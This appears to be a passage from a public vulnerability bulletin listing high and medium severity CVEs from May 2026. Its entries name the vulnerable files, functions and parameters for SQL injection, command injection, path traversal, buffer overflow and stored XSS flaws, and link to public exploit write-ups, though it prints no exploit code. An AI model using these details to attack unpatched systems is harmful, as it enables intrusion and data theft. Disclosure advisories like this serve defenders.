| PrefectHQ--prefect | A flaw has been found in PrefectHQ prefect up to 3.6.13. Affected is an unknown function of the file /api/events/in of the component WebSocket Endpoint. Executing a manipulation can lead to missing authentication. The attack may be performed from remote. The exploit has been published and may be used. Upgrading to version 3.6.14 is able to address this issue. This patch is called f8afecadf88ea5f73694dafa3a365b9d8fae1ad6. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-04 | 7.3 | CVE-2026-7723 | VDB-360899 | PrefectHQ prefect WebSocket Endpoint in missing authentication VDB-360899 | CTI Indicators (IOB, IOC, IOA) Submit #807256 | PerfectHQ Perfect <=3.6.13 Missing Critical Step in Authentication https://gist.github.com/nedlir/f1ab8aa038aafbcc6beeef21fab1d74f https://github.com/PrefectHQ/prefect/pull/20372 https://github.com/PrefectHQ/prefect/commit/f8afecadf88ea5f73694dafa3a365b9d8fae1ad6 https://github.com/PrefectHQ/prefect/releases/tag/3.6.14 https://github.com/PrefectHQ/prefect/ |
| Shandong Hoteam Software--PDM Product Data Management System | A vulnerability was determined in Shandong Hoteam Software PDM Product Data Management System up to 8.3.9. This affects the function GetQueryMachineGridOnePageData of the file /Base/BaseService.asmx/DataService. This manipulation of the argument SortOrder causes sql injection. The attack can be initiated remotely. Upgrading to version 8.3.10 is able to mitigate this issue. You should upgrade the affected component. | 2026-05-04 | 7.3 | CVE-2026-7727 | VDB-360902 | Shandong Hoteam Software PDM Product Data Management System DataService GetQueryMachineGridOnePageData sql injection VDB-360902 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803268 | Shandong Hoteam Software Co., Ltd. PDM <8.3.10 SQL Injection https://ucn9h68n9289.feishu.cn/wiki/KvbxwRlmRihO8ZkT1E1c64pdngh https://en.hoteamsoft.com/pdm |
| n/a--funadmin | A flaw has been found in funadmin up to 7.1.0-rc6. This affects the function UploadService::chunkUpload of the file app/common/service/UploadService.php of the component Frontend Chunked Upload Endpoint. This manipulation of the argument File causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: 59. To fix this issue, it is recommended to deploy a patch. | 2026-05-04 | 7.3 | CVE-2026-7733 | VDB-360908 | funadmin Frontend Chunked Upload Endpoint UploadService.php chunkUpload unrestricted upload VDB-360908 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807559 | FunAdmin v<=V7.1.0-rc6 Unrestricted Upload https://gitee.com/funadmin/funadmin/issues/IJ8NXT https://gitee.com/funadmin/funadmin/pulls/59 https://gitee.com/funadmin/funadmin/ |
| osrg--GoBGP | A vulnerability was found in osrg GoBGP up to 4.3.0. Affected is the function PathAttributeAigp.DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component AIGP Attribute Parser. Performing a manipulation results in buffer overflow. It is possible to initiate the attack remotely. Upgrading to version 4.4.0 is able to address this issue. The patch is named 51ad1ada06cb41ce47b7066799981816f50b7ced. The affected component should be upgraded. | 2026-05-04 | 7.3 | CVE-2026-7735 | VDB-360910 | osrg GoBGP AIGP Attribute bgp.go PathAttributeAigp.DecodeFromBytes buffer overflow VDB-360910 | CTI Indicators (IOB, IOC, IOA) Submit #807600 | GoBGP 4.3.0 Improper Input Validation https://github.com/osrg/gobgp/commit/51ad1ada06cb41ce47b7066799981816f50b7ced https://github.com/osrg/gobgp/releases/tag/v4.4.0 https://github.com/osrg/gobgp/ |
| osrg--GoBGP | A vulnerability was determined in osrg GoBGP up to 4.3.0. Affected by this vulnerability is the function parseRibEntry of the file pkg/packet/mrt/mrt.go. Executing a manipulation can lead to integer underflow. It is possible to launch the attack remotely. Upgrading to version 4.4.0 addresses this issue. This patch is called 76d911046344a3923cbe573364197aa081944592. It is suggested to upgrade the affected component. | 2026-05-04 | 7.3 | CVE-2026-7736 | VDB-360911 | osrg GoBGP mrt.go parseRibEntry integer underflow VDB-360911 | CTI Indicators (IOB, IOC, IOA) Submit #807604 | osrg GoBGP <= 4.3.0 Integer Underflow https://github.com/osrg/gobgp/commit/76d911046344a3923cbe573364197aa081944592 https://github.com/osrg/gobgp/releases/tag/v4.4.0 https://github.com/osrg/gobgp/ |
| @fastify/accepts-serializer--@fastify/accepts-serializer | @fastify/accepts-serializer cached serializer-selection results keyed by the request Accept header without a size limit or eviction policy. A remote unauthenticated client could send many distinct but matching Accept header variants to make the cache grow unbounded, eventually exhausting the Node.js heap and crashing the process. Versions <= 6.0.3 are affected. Update to 6.0.4 or later, which bounds the cache via an LRU with a default size of 100 entries, configurable through the new cacheSize plugin option. | 2026-05-04 | 7.5 | CVE-2026-7768 | https://cna.openjsf.org/security-advisories.html https://github.com/fastify/fastify-accepts-serializer/security/advisories/GHSA-qxhc-wx3p-2wmg |
| HashiCorp--Boundary | Boundary Community Edition and Boundary Enterprise ("Boundary") workers are vulnerable to a denial-of-service condition during node enrollment TLS handshakes. An attacker with network access to the worker authentication listener may open a connection and delay or withhold the client certificate during the TLS handshake, causing worker connection handling to block. This may prevent legitimate worker connections from being accepted or routed. This vulnerability, CVE-2026-7776, is fixed in Boundary 0.21.3, 0.20.3, 0.19.5. | 2026-05-04 | 7.5 | CVE-2026-7776 | https://discuss.hashicorp.com/t/hcsec-2026-11-boundary-workers-vulnerable-to-denial-of-service-during-tls-handshake |
| RTGS2017--NagaAgent | A vulnerability has been found in RTGS2017 NagaAgent up to 5.1.0. This issue affects some unknown processing of the file apiserver/routes/extensions.py of the component Skills Endpoint. Such manipulation of the argument Name leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 7.3 | CVE-2026-7784 | VDB-360981 | RTGS2017 NagaAgent Skills Endpoint extensions.py path traversal VDB-360981 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807744 | RTGS2017 NagaAgent 5.10 Path Traversal https://github.com/RTGS2017/NagaAgent/issues/311 https://github.com/RTGS2017/NagaAgent/ |
| A-G-U-P-T-A--wireshark-mcp | A security flaw has been discovered in A-G-U-P-T-A wireshark-mcp edaf604416fbc94a201b4043092d4a1b09a12275/400c3da70074f22f3cce7ccb65304cafc7089c89. This affects the function quick_capture of the file pyshark_mcp.py. The manipulation results in os command injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 7.3 | CVE-2026-7785 | VDB-360985 | A-G-U-P-T-A wireshark-mcp pyshark_mcp.py quick_capture os command injection VDB-360985 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807745 | A-G-U-P-T-A wireshark-mcp 400c3da70074f22f3cce7ccb65304cafc7089c89 Command Injection https://github.com/A-G-U-P-T-A/wireshark-mcp/issues/1 https://github.com/A-G-U-P-T-A/wireshark-mcp/ |
| Axle-Bucamp--MCP-Docusaurus | A security flaw has been discovered in Axle-Bucamp MCP-Docusaurus up to 404bc028e15ec304c9a045528560f4b5f27a17e0. The affected element is the function update_document/continue_document/delete_document/get_content of the file app/routes/document.py. Performing a manipulation of the argument DOCS_DIR/path results in path traversal. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 7.3 | CVE-2026-7788 | VDB-360994 | Axle-Bucamp MCP-Docusaurus document.py get_content path traversal VDB-360994 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807746 | Axle-Bucamp MCP-Docusaurus 404bc028e15ec304c9a045528560f4b5f27a17e0 Path Traversal https://github.com/Axle-Bucamp/MCP-Docusaurus/issues/2 https://github.com/Axle-Bucamp/MCP-Docusaurus/ |
| Amazon--Workspaces | Improper privilege management in the log rotation mechanism of the Skylight Workspace Config Service in Amazon WorkSpaces for Windows before 2.6.2034.0 allows a local non-admin authenticated user to place arbitrary files into arbitrary locations bypassing file system permission protections, leading to local privilege escalation to SYSTEM. | 2026-05-04 | 7.8 | CVE-2026-7791 | https://aws.amazon.com/security/security-bulletins/2026-025-aws/ |
| UsamaK98--python-notebook-mcp | A flaw has been found in UsamaK98 python-notebook-mcp up to a05a232815809a7e425b5fa7be26e0d4369894c2. Impacted is the function create_notebook/read_notebook/edit_cell/add_cell of the file server.py. This manipulation causes path traversal. It is possible to initiate the attack remotely. The exploit has been published and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 7.3 | CVE-2026-7810 | VDB-361070 | UsamaK98 python-notebook-mcp server.py add_cell path traversal VDB-361070 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807748 | UsamaK98 python-notebook-mcp a05a232815809a7e425b5fa7be26e0d4369894c2 Path Traversal https://github.com/UsamaK98/python-notebook-mcp/issues/5 https://github.com/UsamaK98/python-notebook-mcp/ |
| 54yyyu--code-mcp | A vulnerability has been found in 54yyyu code-mcp up to 4cfc4643541a110c906d93635b391bf7e357f4a8. The affected element is the function is_safe_path of the file src/code_mcp/server.py of the component MCP File Handler. Such manipulation leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 7.3 | CVE-2026-7811 | VDB-361071 | 54yyyu code-mcp MCP File server.py is_safe_path path traversal VDB-361071 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807751 | 54yyyu code-mcp 4cfc4643541a110c906d93635b391bf7e357f4a8 Path Traversal https://github.com/54yyyu/code-mcp/issues/4 https://github.com/54yyyu/code-mcp/ |
| 54yyyu--code-mcp | A vulnerability was found in 54yyyu code-mcp up to 4cfc4643541a110c906d93635b391bf7e357f4a8. The impacted element is the function git_operation of the file src/code_mcp/server.py of the component MCP Tool. Performing a manipulation of the argument operation results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 7.3 | CVE-2026-7812 | VDB-361072 | 54yyyu code-mcp MCP Tool server.py git_operation command injection VDB-361072 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807752 | 54yyyu code-mcp 4cfc4643541a110c906d93635b391bf7e357f4a8 Command Injection https://github.com/54yyyu/code-mcp/issues/5 https://github.com/54yyyu/code-mcp/ |
| Ivanti--Endpoint Manager Mobile | Improper certificate validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote unauthenticated attacker to enroll a device belonging to a restricted set of unenrolled devices, leading to information disclosure about EPMM appliance and impacting on the integrity of the newly enrolled device identity. | 2026-05-07 | 7.4 | CVE-2026-7821 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en_US |
| IObit--Advanced SystemCare | A security flaw has been discovered in IObit Advanced SystemCare 19. This affects an unknown part of the file ASC.exe of the component Service. The manipulation results in symlink following. Attacking locally is a requirement. This attack is characterized by high complexity. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. | 2026-05-05 | 7 | CVE-2026-7832 | VDB-361111 | IObit Advanced SystemCare Service ASC.exe symlink VDB-361111 | CTI Indicators (IOB, IOC, IOA) Submit #797630 | IObit Advanced SystemCare 19 Link Following https://github.com/usernameone101/Writeups/blob/main/IObit%20Zero%20Day%20(Updated%20v2).pdf |
| EFM--ipTIME C200 | A weakness has been identified in EFM ipTIME C200 up to 1.092. This vulnerability affects the function sub_408F90 of the file /cgi/iux_set.cgi of the component ApplyRestore Endpoint. This manipulation of the argument RestoreFile causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-05 | 7.2 | CVE-2026-7833 | VDB-361112 | EFM ipTIME C200 ApplyRestore Endpoint iux_set.cgi sub_408F90 command injection VDB-361112 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807786 | iptime c200 1.092 Command Injection https://github.com/glkfc/IoT-Vulnerability/blob/main/iptime/c200/sub_409054_vulnerability_report_EN.md |
| D-Link--DI-8100 | A vulnerability was identified in D-Link DI-8100 16.07.26A1. This affects the function sprintf of the file yyxz.asp. The manipulation of the argument ID leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2026-05-05 | 7.2 | CVE-2026-7851 | VDB-361128 | D-Link DI-8100 yyxz.asp sprintf stack-based overflow VDB-361128 | CTI Indicators (IOB, IOC, IOA) Submit #807798 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/yyxz_dlink_asp_overflow.md https://www.dlink.com/ |
| D-Link--DI-8100 | A flaw has been found in D-Link DI-8100 16.07.26A1. This affects an unknown part of the file /url_member.asp of the component Web Management Interface. Executing a manipulation of the argument Name can lead to buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. | 2026-05-05 | 7.2 | CVE-2026-7856 | VDB-361133 | D-Link DI-8100 Web Management url_member.asp buffer overflow VDB-361133 | CTI Indicators (IOB, IOC, IOA) Submit #807849 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/url_member_asp_overflow.md https://www.dlink.com/ |
| D-Link--DI-8100 | A vulnerability has been found in D-Link DI-8100 16.07.26A1. This vulnerability affects the function sprintf of the file /user_group.asp of the component CGI Handler. The manipulation leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-05-05 | 7.2 | CVE-2026-7857 | VDB-361134 | D-Link DI-8100 CGI user_group.asp sprintf buffer overflow VDB-361134 | CTI Indicators (IOB, IOC, IOA) Submit #807853 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/user_group_asp_overflow.md https://www.dlink.com/ |
| PicoTronica--e-Clinic Healthcare System ECHS | A flaw has been found in PicoTronica e-Clinic Healthcare System ECHS 5.7. The impacted element is an unknown function of the file /cdemos/echs/priv/echs.js. This manipulation of the argument ADMIN_KEY causes hard-coded credentials. The attack is possible to be carried out remotely. The exploit has been published and may be used. Upgrading to version 5.7.1 is sufficient to resolve this issue. The affected component should be upgraded. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-06 | 7.3 | CVE-2026-8032 | VDB-361358 | PicoTronica e-Clinic Healthcare System ECHS echs.js hard-coded credentials VDB-361358 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800792 | PicoTronica e-Clinic Healthcare System (ECHS) v5.7 Improper Privilege Management https://docs.google.com/document/d/1w1veNs8I3nxsVxbSiIgJmt-4S5a0rW0bvjDvEe7iDr0/edit?usp=sharing |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability was found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects an unknown part of the file /ajax.php?action=save_user. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-07 | 7.3 | CVE-2026-8083 | VDB-361837 | SourceCodester Pharmacy Sales and Inventory System ajax.php save_user sql injection VDB-361837 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807848 | sourcecodester Pharmacy Sales and Inventory System V1.0 SQL injection https://github.com/zhi-cyber/cve-2/issues/1 https://www.sourcecodester.com/ |
| code-projects--Feedback System | A security vulnerability has been detected in code-projects Feedback System 1.0. Impacted is an unknown function of the file /admin/checklogin.php. Such manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-05-07 | 7.3 | CVE-2026-8098 | VDB-361851 | code-projects Feedback System checklogin.php sql injection VDB-361851 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808126 | code-projects FEEDBACK SYSTEM V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/3 https://code-projects.org/ |
| SourceCodester--Comment System | A flaw has been found in SourceCodester Comment System 1.0. This issue affects some unknown processing of the file post_comment.php. This manipulation of the argument Name causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-05-08 | 7.3 | CVE-2026-8126 | VDB-361916 | SourceCodester Comment System post_comment.php sql injection VDB-361916 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808686 | sourcecodester Comment System V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/7 https://www.sourcecodester.com/ |
| SourceCodester--SUP Online Shopping | A vulnerability was found in SourceCodester SUP Online Shopping 1.0. The affected element is an unknown function of the file /admin/viewmsg.php. Performing a manipulation of the argument msgid results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2026-05-08 | 7.3 | CVE-2026-8128 | VDB-361918 | SourceCodester SUP Online Shopping viewmsg.php sql injection VDB-361918 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808772 | sourcecodester SUP Online Shopping V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/9 https://www.sourcecodester.com/ |
| SourceCodester--SUP Online Shopping | A vulnerability was determined in SourceCodester SUP Online Shopping 1.0. The impacted element is an unknown function of the file wishlist.php. Executing a manipulation of the argument delwlistid can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-05-08 | 7.3 | CVE-2026-8129 | VDB-361919 | SourceCodester SUP Online Shopping wishlist.php sql injection VDB-361919 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808773 | sourcecodester SUP Online Shopping V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/10 https://www.sourcecodester.com/ |
| SourceCodester--SUP Online Shopping | A vulnerability was identified in SourceCodester SUP Online Shopping 1.0. This affects an unknown function of the file /admin/message.php. The manipulation of the argument seenid leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-05-08 | 7.3 | CVE-2026-8130 | VDB-361920 | SourceCodester SUP Online Shopping message.php sql injection VDB-361920 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808774 | sourcecodester SUP Online Shopping V1.0 SQL Injection https://github.com/redshadowword-cell/CVE/issues/11 https://www.sourcecodester.com/ |
| SourceCodester--SUP Online Shopping | A security flaw has been discovered in SourceCodester SUP Online Shopping 1.0. This impacts an unknown function of the file /admin/replymsg.php. The manipulation of the argument msgid results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-08 | 7.3 | CVE-2026-8131 | VDB-361921 | SourceCodester SUP Online Shopping replymsg.php sql injection VDB-361921 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808775 | sourcecodester SUP Online Shopping V1.0 sql https://github.com/redshadowword-cell/CVE/issues/12 https://www.sourcecodester.com/ |
| CodeAstro--Leave Management System | A weakness has been identified in CodeAstro Leave Management System 1.0. Affected is an unknown function of the file /login.php. This manipulation of the argument txt_username causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-08 | 7.3 | CVE-2026-8132 | VDB-361922 | CodeAstro Leave Management System login.php sql injection VDB-361922 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808784 | codeastro Leave Management System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/64 https://codeastro.com/ |
| zyx0814--FilePress | A security vulnerability has been detected in zyx0814 FilePress up to 2.2.0. Affected by this vulnerability is an unknown functionality of the file dzz/shares/admin.php of the component Shares Filelist API. Such manipulation of the argument order leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The name of the patch is e20ec58414103f781858f2951d178e19b1736664. A patch should be applied to remediate this issue. | 2026-05-08 | 7.3 | CVE-2026-8133 | VDB-361923 | zyx0814 FilePress Shares Filelist API admin.php sql injection VDB-361923 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808819 | zyx0814 FilePress <=2.2.0 SQL Injection https://github.com/zyx0814/FilePress/issues/70 https://github.com/zyx0814/FilePress/pull/71 https://github.com/xiaohaiyang-ai/Web-Security-Research/tree/main/FilePress/Shares-API-PreAuth-SQLi https://github.com/zyx0814/FilePress/commit/e20ec58414103f781858f2951d178e19b1736664 https://github.com/zyx0814/FilePress/ |
| Industrial Application Software IAS--Canias ERP | A vulnerability was identified in Industrial Application Software IAS Canias ERP 8.03. This issue affects the function iasServerRemoteInterface.doAction of the component Java RMI Session Management. Such manipulation leads to improper authentication. The attack can be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 7.3 | CVE-2026-8216 | VDB-362433 | Industrial Application Software IAS Canias ERP Java RMI Session Management iasServerRemoteInterface.doAction improper authentication VDB-362433 | CTI Indicators (IOB, IOC, IOA) Submit #808244 | Industrial Application Software - IAS Canias ERP 8.03-- Improper Authentication (CWE-287) https://hawktrace.com/blog/caniaserp |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Rocketsoft--Rocket LMS | Rocket LMS 1.1 contains a persistent cross-site scripting vulnerability in the support ticket module that allows authenticated users to inject malicious script code through the title parameter. Attackers can submit support tickets with embedded HTML/JavaScript payloads that execute in the browsers of other users viewing the message history, enabling session hijacking and phishing attacks. | 2026-05-10 | 6.4 | CVE-2021-47907 | ExploitDB-50677 Official Product Homepage VulnCheck Advisory: Rocket LMS 1.1 Persistent Cross-Site Scripting via Support Tickets |
| Accesspressthemes--AccessPress Social Icons | AccessPress Social Icons 1.8.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by entering JavaScript payloads into the 'icon title' field. Attackers can store XSS payloads like image tags with onerror event handlers that execute when the plugin page is viewed, affecting all users who access the plugin interface. | 2026-05-10 | 6.4 | CVE-2021-47910 | ExploitDB-50515 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin AccessPress Social Icons 1.8.2 Stored XSS |
| Soliloquywp--Slider by Soliloquy | Slider by Soliloquy 2.6.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the title parameter. Attackers can add JavaScript payloads in the title field when creating or editing sliders, which executes in the browsers of users viewing the slider on both administrative and frontend pages. | 2026-05-10 | 6.4 | CVE-2021-47922 | ExploitDB-50563 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Slider by Soliloquy 2.6.2 Stored XSS |
| Etoilewebdesign--Ultimate Product Catalog | Ultimate Product Catalog 5.8.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the price parameter. Attackers can submit POST requests to post.php with HTML/JavaScript payloads in the price field to execute arbitrary code when the product is viewed. | 2026-05-10 | 6.4 | CVE-2021-47924 | ExploitDB-50534 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Ultimate Product Catalog 5.8.2 Stored XSS via price |
| Cmdbuild--CMDBuild | CMDBuild 3.3.2 contains multiple stored cross-site scripting vulnerabilities that allow authenticated attackers to inject arbitrary web script or HTML via crafted input in card creation and file upload endpoints. Attackers can inject XSS payloads through Employee card parameters or SVG file attachments in the classes endpoint, which execute when other users view the affected records or preview attachments. | 2026-05-10 | 6.4 | CVE-2021-47925 | ExploitDB-50527 Official Product Homepage Product Reference VulnCheck Advisory: CMDBuild 3.3.2 Multiple Stored Cross-Site Scripting |
| Form2Email--Contact Form to Email | Contact Form to Email 1.3.24 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating forms with script tags in the form name field. Attackers can craft form names containing JavaScript code that executes when other logged-in users access the form management page, enabling session hijacking or credential theft. | 2026-05-10 | 6.4 | CVE-2021-47926 | ExploitDB-50524 Official Product Homepage VulnCheck Advisory: WordPress Contact Form to Email 1.3.24 Stored XSS |
| Wpsymposiumpro--WP Symposium Pro | WordPress Plugin WP Symposium Pro 2021.10 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by exploiting insufficient sanitization of the forum name parameter. Attackers can submit POST requests to the admin setup page with JavaScript payloads in the wps_admin_forum_add_name parameter, which are stored and executed when the forum is accessed. | 2026-05-10 | 6.4 | CVE-2021-47927 | ExploitDB-50514 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin WP Symposium Pro 2021.10 Stored XSS via wps_admin_forum_add_name |
| Filterable-Portfolio--Filterable Portfolio Gallery | Filterable Portfolio Gallery 1.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by entering payloads in the title field. Attackers can store JavaScript code like image tags with onerror handlers that execute when the gallery is previewed, affecting all users viewing the page. | 2026-05-10 | 6.4 | CVE-2021-47929 | ExploitDB-50458 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Filterable Portfolio Gallery 1.0 Stored XSS |
| Exponentcms--Exponent CMS | Exponent CMS 2.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the Title and Text Block parameters in the text editing endpoint. Attackers can inject iframe payloads with embedded SVG onload events to execute arbitrary JavaScript, and the application also exposes database credentials in responses and lacks brute-force protection on authentication endpoints. | 2026-05-10 | 6.4 | CVE-2021-47931 | ExploitDB-50611 Official Product Homepage VulnCheck Advisory: Exponent CMS 2.6 Multiple Vulnerabilities Stored XSS Authentication |
| Projectsend--Projectsend | Projectsend r1295 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input in the 'name' parameter of files-edit.php. Attackers can inject JavaScript payloads through the file name field that execute in the browser when the file is viewed by other users, particularly affecting System Administrator users on the Dashboard page. | 2026-05-10 | 6.4 | CVE-2021-47947 | ExploitDB-50240 Official Product Homepage Product Reference VulnCheck Advisory: Projectsend r1295 Stored Cross-Site Scripting via files-edit.php |
| Ampps--Advanced Guestbook | Advanced Guestbook 2.4.4 contains a persistent cross-site scripting vulnerability in the smilies administration interface that allows authenticated attackers to inject malicious scripts by manipulating the s_emotion parameter. Attackers can submit POST requests to admin.php with JavaScript code in the s_emotion field, which executes when administrators view the smilies tab. | 2026-05-10 | 6.4 | CVE-2021-47950 | ExploitDB-49875 Official Product Homepage VulnCheck Advisory: Advanced Guestbook 2.4.4 Persistent XSS via Smilies |
| picture-gallery--Picture Gallery | WordPress Picture Gallery 1.4.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the Edit Content URL field in the Access Control settings. Attackers can enter JavaScript payloads in the plugin options that are stored in the database and executed when the functionality is triggered, enabling session hijacking or credential theft. | 2026-05-10 | 6.4 | CVE-2021-47951 | ExploitDB-50187 Product Reference VulnCheck Advisory: WordPress Picture Gallery 1.4.2 Stored XSS via Edit Content URL |
| Moodle--Moodle LMS | Moodle LMS 4.0 contains a cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting payloads through the search parameter. Attackers can inject JavaScript code via the search field in course/search.php to execute arbitrary scripts in users' browsers and steal session cookies. | 2026-05-10 | 6.1 | CVE-2022-50943 | ExploitDB-51115 Official Product Homepage Product Reference VulnCheck Advisory: Moodle LMS 4.0 Cross-Site Scripting via course search.php |
| 3dady--real-time web stats | WordPress 3dady real-time web stats plugin 1.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by exploiting unsanitized input fields. Attackers can insert JavaScript payloads in the dady_input_text or dady2_input_text fields via the plugin options panel to execute arbitrary code when the page is viewed. | 2026-05-10 | 6.4 | CVE-2022-50945 | ExploitDB-51021 Official Product Homepage VulnCheck Advisory: WordPress 3dady Real-Time Web Stats 1.0 Stored XSS |
| netroics--Netroics Blog Posts Grid | WordPress Plugin Netroics Blog Posts Grid 1.0 contains a stored cross-site scripting vulnerability that allows authenticated editors to inject malicious scripts by failing to sanitize the post_title parameter. Attackers with editor privileges can inject script payloads through the testimonial title field that execute in the browsers of other users viewing the draft post, enabling cookie theft and session hijacking. | 2026-05-10 | 6.4 | CVE-2022-50946 | ExploitDB-51008 Product Reference VulnCheck Advisory: WordPress Plugin Netroics Blog Posts Grid 1.0 Stored XSS |
| RadiusTheme--Testimonial Slider and Showcase | WordPress Plugin Testimonial Slider and Showcase 2.2.6 contains a stored cross-site scripting vulnerability that allows authenticated editors to inject malicious scripts by failing to sanitize the post_title parameter. Attackers with editor privileges can inject JavaScript payloads through the testimonial title field that execute in the browsers of users viewing the draft post, enabling cookie theft and session hijacking. | 2026-05-10 | 6.4 | CVE-2022-50947 | ExploitDB-51007 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Testimonial Slider and Showcase 2.2.6 Stored XSS |
| Motopress--Motopress Hotel Booking Lite | Motopress Hotel Booking Lite 4.2.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting payloads in accommodation type fields. Attackers can inject script tags through the title and excerpt parameters when creating accommodation types, which execute in the browser when visitors access the accommodations page. | 2026-05-10 | 6.4 | CVE-2022-50948 | ExploitDB-50951 Official Product Homepage VulnCheck Advisory: Motopress Hotel Booking Lite 4.2.4 Stored Cross-Site Scripting |
| A-J-Evolution--Videos sync PDF | WordPress Plugin Videos sync PDF 1.7.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by exploiting unsanitized nom, pdf, mp4, webm, and ogg parameters. Attackers can inject payloads like autofocus onfocus event handlers through the plugin options panel to execute arbitrary JavaScript when administrators view or edit video settings. | 2026-05-10 | 6.4 | CVE-2022-50949 | ExploitDB-50874 Official Product Homepage VulnCheck Advisory: WordPress Plugin Videos sync PDF 1.7.4 Stored XSS |
